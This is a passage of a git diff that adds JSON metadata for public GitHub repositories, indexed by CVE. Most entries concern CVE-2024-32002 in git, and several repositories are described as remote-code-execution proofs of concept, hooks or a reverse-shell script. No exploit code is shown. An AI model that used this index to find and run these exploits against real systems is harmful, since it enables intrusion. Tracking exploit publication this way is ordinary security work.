+ "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818783620, + "name": "CVE-2024-31982", + "full_name": "bigb0x\/CVE-2024-31982", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-31982", + "description": "POC for CVE-2024-31982: XWiki Platform Remote Code Execution > 14.10.20", + "fork": false, + "created_at": "2024-06-22T21:20:33Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-22T22:29:24Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31989.json b/2024/CVE-2024-31989.json new file mode 100644 index 0000000000..ed585364ff --- /dev/null +++ b/2024/CVE-2024-31989.json @@ -0,0 +1,33 @@ +[ + { + "id": 830068924, + "name": "CVE-2024-31989", + "full_name": "vt0x78\/CVE-2024-31989", + "owner": { + "login": "vt0x78", + "id": 140315902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140315902?v=4", + "html_url": "https:\/\/github.com\/vt0x78", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vt0x78\/CVE-2024-31989", + "description": "Exploit for CVE-2024-31989.", + "fork": false, + "created_at": "2024-07-17T14:23:52Z", + "updated_at": "2024-08-08T18:35:48Z", + "pushed_at": "2024-07-24T12:06:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32002.json b/2024/CVE-2024-32002.json new file mode 100644 index 0000000000..bb06715f3b --- /dev/null +++ b/2024/CVE-2024-32002.json @@ -0,0 +1,2019 @@ +[ + { + "id": 802138178, + "name": "CVE-2024-32002", + "full_name": "markuta\/CVE-2024-32002", + "owner": { + "login": "markuta", + "id": 9108334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9108334?v=4", + "html_url": "https:\/\/github.com\/markuta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/markuta\/CVE-2024-32002", + "description": "A proof of concept for the git vulnerability CVE-2024-32002", + "fork": false, + "created_at": "2024-05-17T15:35:50Z", + "updated_at": "2024-10-28T06:59:18Z", + "pushed_at": "2024-05-30T21:04:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802139060, + "name": "hooky", + "full_name": "markuta\/hooky", + "owner": { + "login": "markuta", + "id": 9108334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9108334?v=4", + "html_url": "https:\/\/github.com\/markuta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/markuta\/hooky", + "description": "A submodule for exploiting CVE-2024-32002 vulnerability.", + "fork": false, + "created_at": "2024-05-17T15:37:42Z", + "updated_at": "2024-05-17T17:00:30Z", + "pushed_at": "2024-05-17T17:00:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802232037, + "name": "git_rce", + "full_name": "amalmurali47\/git_rce", + "owner": { + "login": "amalmurali47", + "id": 3582096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3582096?v=4", + "html_url": "https:\/\/github.com\/amalmurali47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amalmurali47\/git_rce", + "description": "Exploit PoC for CVE-2024-32002", + "fork": false, + "created_at": "2024-05-17T19:33:08Z", + "updated_at": "2025-01-03T09:52:19Z", + "pushed_at": "2024-05-19T07:12:00Z", + "stargazers_count": 521, + "watchers_count": 521, + "has_discussions": false, + "forks_count": 144, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-32002", + "git", + "proof-of-concept", + "rce" + ], + "visibility": "public", + "forks": 144, + "watchers": 521, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 802232904, + "name": "hook", + "full_name": "amalmurali47\/hook", + "owner": { + "login": "amalmurali47", + "id": 3582096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3582096?v=4", + "html_url": "https:\/\/github.com\/amalmurali47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amalmurali47\/hook", + "description": "Hook for the PoC for exploiting CVE-2024-32002", + "fork": false, + "created_at": "2024-05-17T19:35:44Z", + "updated_at": "2024-10-31T07:05:58Z", + "pushed_at": "2024-05-19T06:30:05Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802333923, + "name": "CVE-2024-32002", + "full_name": "M507\/CVE-2024-32002", + "owner": { + "login": "M507", + "id": 38591075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38591075?v=4", + "html_url": "https:\/\/github.com\/M507", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M507\/CVE-2024-32002", + "description": "local poc for CVE-2024-32002", + "fork": false, + "created_at": "2024-05-18T02:42:33Z", + "updated_at": "2024-06-20T21:48:47Z", + "pushed_at": "2024-05-18T19:32:18Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-32002", + "git", + "proof-of-concept", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802464979, + "name": "cve-2024-32002-submodule-rce", + "full_name": "JakobTheDev\/cve-2024-32002-submodule-rce", + "owner": { + "login": "JakobTheDev", + "id": 21337744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4", + "html_url": "https:\/\/github.com\/JakobTheDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-submodule-rce", + "description": null, + "fork": false, + "created_at": "2024-05-18T11:20:31Z", + "updated_at": "2024-05-25T12:20:05Z", + "pushed_at": "2024-05-25T12:05:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802465835, + "name": "cve-2024-32002-poc-rce", + "full_name": "JakobTheDev\/cve-2024-32002-poc-rce", + "owner": { + "login": "JakobTheDev", + "id": 21337744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4", + "html_url": "https:\/\/github.com\/JakobTheDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-poc-rce", + "description": null, + "fork": false, + "created_at": "2024-05-18T11:23:43Z", + "updated_at": "2024-07-03T13:48:33Z", + "pushed_at": "2024-05-25T12:18:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802533707, + "name": "CVE-2024-32002", + "full_name": "safebuffer\/CVE-2024-32002", + "owner": { + "login": "safebuffer", + "id": 20618414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20618414?v=4", + "html_url": "https:\/\/github.com\/safebuffer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safebuffer\/CVE-2024-32002", + "description": "CVE-2024-32002 RCE PoC", + "fork": false, + "created_at": "2024-05-18T15:05:28Z", + "updated_at": "2024-12-19T04:00:37Z", + "pushed_at": "2024-05-18T15:12:59Z", + "stargazers_count": 104, + "watchers_count": 104, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "git", + "rce" + ], + "visibility": "public", + "forks": 25, + "watchers": 104, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 802725660, + "name": "CVE-2024-32002-POC", + "full_name": "10cks\/CVE-2024-32002-POC", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-POC", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:05:07Z", + "updated_at": "2024-05-19T05:05:10Z", + "pushed_at": "2024-05-19T05:05:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802726337, + "name": "CVE-2024-32002-hulk", + "full_name": "10cks\/CVE-2024-32002-hulk", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-hulk", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:08:08Z", + "updated_at": "2024-05-19T05:29:27Z", + "pushed_at": "2024-05-19T05:29:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802726386, + "name": "CVE-2024-32002-submod", + "full_name": "10cks\/CVE-2024-32002-submod", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-submod", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:08:22Z", + "updated_at": "2024-05-19T05:11:25Z", + "pushed_at": "2024-05-19T05:11:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802726432, + "name": "CVE-2024-32002-smash", + "full_name": "10cks\/CVE-2024-32002-smash", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-smash", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:08:36Z", + "updated_at": "2024-05-19T05:08:36Z", + "pushed_at": "2024-05-19T05:08:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802731173, + "name": "CVE-2024-32002-linux-hulk", + "full_name": "10cks\/CVE-2024-32002-linux-hulk", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-hulk", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:31:41Z", + "updated_at": "2024-05-19T05:33:27Z", + "pushed_at": "2024-05-19T05:33:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802731253, + "name": "CVE-2024-32002-linux-submod", + "full_name": "10cks\/CVE-2024-32002-linux-submod", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-submod", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:32:08Z", + "updated_at": "2024-05-19T05:33:50Z", + "pushed_at": "2024-05-19T05:33:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802731336, + "name": "CVE-2024-32002-linux-smash", + "full_name": "10cks\/CVE-2024-32002-linux-smash", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-smash", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:32:34Z", + "updated_at": "2024-05-19T05:32:34Z", + "pushed_at": "2024-05-19T05:32:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802930172, + "name": "poc_CVE-2024-32002", + "full_name": "aitorcastel\/poc_CVE-2024-32002", + "owner": { + "login": "aitorcastel", + "id": 28706936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28706936?v=4", + "html_url": "https:\/\/github.com\/aitorcastel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aitorcastel\/poc_CVE-2024-32002", + "description": null, + "fork": false, + "created_at": "2024-05-19T16:33:35Z", + "updated_at": "2024-05-19T16:34:58Z", + "pushed_at": "2024-05-19T16:34:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802930338, + "name": "poc_CVE-2024-32002_submodule", + "full_name": "aitorcastel\/poc_CVE-2024-32002_submodule", + "owner": { + "login": "aitorcastel", + "id": 28706936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28706936?v=4", + "html_url": "https:\/\/github.com\/aitorcastel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aitorcastel\/poc_CVE-2024-32002_submodule", + "description": null, + "fork": false, + "created_at": "2024-05-19T16:34:11Z", + "updated_at": "2024-05-19T16:34:52Z", + "pushed_at": "2024-05-19T16:34:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803075707, + "name": "hook", + "full_name": "10cks\/hook", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/hook", + "description": "CVE-2024-32002-hook", + "fork": false, + "created_at": "2024-05-20T02:44:07Z", + "updated_at": "2024-05-20T06:46:22Z", + "pushed_at": "2024-05-20T02:47:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803077786, + "name": "CVE-2024-32002_HOOK", + "full_name": "jweny\/CVE-2024-32002_HOOK", + "owner": { + "login": "jweny", + "id": 26767398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4", + "html_url": "https:\/\/github.com\/jweny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jweny\/CVE-2024-32002_HOOK", + "description": null, + "fork": false, + "created_at": "2024-05-20T02:52:42Z", + "updated_at": "2024-05-22T18:10:22Z", + "pushed_at": "2024-05-20T03:12:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803079258, + "name": "CVE-2024-32002_EXP", + "full_name": "jweny\/CVE-2024-32002_EXP", + "owner": { + "login": "jweny", + "id": 26767398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4", + "html_url": "https:\/\/github.com\/jweny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jweny\/CVE-2024-32002_EXP", + "description": null, + "fork": false, + "created_at": "2024-05-20T02:58:57Z", + "updated_at": "2024-06-03T15:35:41Z", + "pushed_at": "2024-05-20T07:26:49Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803132723, + "name": "CVE-2024-32002_EXP", + "full_name": "CrackerCat\/CVE-2024-32002_EXP", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2024-32002_EXP", + "description": null, + "fork": false, + "created_at": "2024-05-20T06:12:02Z", + "updated_at": "2024-05-20T08:13:06Z", + "pushed_at": "2024-05-20T03:17:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 803811564, + "name": "hook", + "full_name": "Roronoawjd\/hook", + "owner": { + "login": "Roronoawjd", + "id": 105417063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105417063?v=4", + "html_url": "https:\/\/github.com\/Roronoawjd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Roronoawjd\/hook", + "description": "CVE-2024-32002 hook POC", + "fork": false, + "created_at": "2024-05-21T12:31:57Z", + "updated_at": "2024-05-21T12:36:15Z", + "pushed_at": "2024-05-21T12:36:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803835949, + "name": "git_rce", + "full_name": "Roronoawjd\/git_rce", + "owner": { + "login": "Roronoawjd", + "id": 105417063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105417063?v=4", + "html_url": "https:\/\/github.com\/Roronoawjd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Roronoawjd\/git_rce", + "description": "CVE-2024-32002 POC", + "fork": false, + "created_at": "2024-05-21T13:19:15Z", + "updated_at": "2024-05-23T11:24:50Z", + "pushed_at": "2024-05-23T11:24:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803851228, + "name": "CVE-2024-32002-Reverse-Shell", + "full_name": "JJoosh\/CVE-2024-32002-Reverse-Shell", + "owner": { + "login": "JJoosh", + "id": 122099216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122099216?v=4", + "html_url": "https:\/\/github.com\/JJoosh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JJoosh\/CVE-2024-32002-Reverse-Shell", + "description": "Este script demuestra cómo explotar la vulnerabilidad CVE-2024-32002 para obtener una reverse shell, proporcionando acceso remoto al sistema afectado. Úselo con precaución en entornos controlados y solo con fines educativos o de pruebas de seguridad.", + "fork": false, + "created_at": "2024-05-21T13:45:58Z", + "updated_at": "2024-05-23T15:14:13Z", + "pushed_at": "2024-05-21T14:01:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804285979, + "name": "CVE-2024-32002-poc", + "full_name": "1mxml\/CVE-2024-32002-poc", + "owner": { + "login": "1mxml", + "id": 94277520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94277520?v=4", + "html_url": "https:\/\/github.com\/1mxml", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1mxml\/CVE-2024-32002-poc", + "description": null, + "fork": false, + "created_at": "2024-05-22T10:01:58Z", + "updated_at": "2024-05-22T10:02:02Z", + "pushed_at": "2024-05-22T10:01:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804311936, + "name": "CVE-2024-32002-hook", + "full_name": "bfengj\/CVE-2024-32002-hook", + "owner": { + "login": "bfengj", + "id": 63182771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63182771?v=4", + "html_url": "https:\/\/github.com\/bfengj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bfengj\/CVE-2024-32002-hook", + "description": null, + "fork": false, + "created_at": "2024-05-22T11:05:48Z", + "updated_at": "2024-05-22T11:07:24Z", + "pushed_at": "2024-05-22T11:07:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804320454, + "name": "CVE-2024-32002-hulk", + "full_name": "ycdxsb\/CVE-2024-32002-hulk", + "owner": { + "login": "ycdxsb", + "id": 32149596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4", + "html_url": "https:\/\/github.com\/ycdxsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ycdxsb\/CVE-2024-32002-hulk", + "description": null, + "fork": false, + "created_at": "2024-05-22T11:26:30Z", + "updated_at": "2024-05-22T11:32:40Z", + "pushed_at": "2024-05-22T11:32:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804320768, + "name": "CVE-2024-32002-submod", + "full_name": "ycdxsb\/CVE-2024-32002-submod", + "owner": { + "login": "ycdxsb", + "id": 32149596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4", + "html_url": "https:\/\/github.com\/ycdxsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ycdxsb\/CVE-2024-32002-submod", + "description": null, + "fork": false, + "created_at": "2024-05-22T11:27:14Z", + "updated_at": "2024-05-22T11:32:58Z", + "pushed_at": "2024-05-22T11:32:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804323007, + "name": "CVE-2024-32002-Exploit", + "full_name": "bfengj\/CVE-2024-32002-Exploit", + "owner": { + "login": "bfengj", + "id": 63182771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63182771?v=4", + "html_url": "https:\/\/github.com\/bfengj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bfengj\/CVE-2024-32002-Exploit", + "description": null, + "fork": false, + "created_at": "2024-05-22T11:32:33Z", + "updated_at": "2024-05-29T01:55:16Z", + "pushed_at": "2024-05-22T11:39:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804523151, + "name": "CVE-2024-32002", + "full_name": "vincepsh\/CVE-2024-32002", + "owner": { + "login": "vincepsh", + "id": 60623403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60623403?v=4", + "html_url": "https:\/\/github.com\/vincepsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincepsh\/CVE-2024-32002", + "description": "Repo for testing CVE-2024-32002", + "fork": false, + "created_at": "2024-05-22T18:43:36Z", + "updated_at": "2024-05-22T21:16:26Z", + "pushed_at": "2024-05-22T21:16:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804525927, + "name": "CVE-2024-32002-hook", + "full_name": "vincepsh\/CVE-2024-32002-hook", + "owner": { + "login": "vincepsh", + "id": 60623403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60623403?v=4", + "html_url": "https:\/\/github.com\/vincepsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincepsh\/CVE-2024-32002-hook", + "description": "CVE-2024-32002-hook", + "fork": false, + "created_at": "2024-05-22T18:50:56Z", + "updated_at": "2024-05-22T18:57:39Z", + "pushed_at": "2024-05-22T18:57:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804616476, + "name": "CVE-2024-32002", + "full_name": "JJoosh\/CVE-2024-32002", + "owner": { + "login": "JJoosh", + "id": 122099216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122099216?v=4", + "html_url": "https:\/\/github.com\/JJoosh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JJoosh\/CVE-2024-32002", + "description": "This is the main repository for CVE 2024-32002, and requires recursive cloning because it contains the submodels necessary for execution.", + "fork": false, + "created_at": "2024-05-22T23:49:22Z", + "updated_at": "2024-08-27T20:46:18Z", + "pushed_at": "2024-05-22T23:55:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804686415, + "name": "CVE-2024-32002-EXP", + "full_name": "10cks\/CVE-2024-32002-EXP", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-EXP", + "description": null, + "fork": false, + "created_at": "2024-05-23T04:25:51Z", + "updated_at": "2024-05-23T05:05:20Z", + "pushed_at": "2024-05-23T04:26:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804727102, + "name": "CVE-2024-32002", + "full_name": 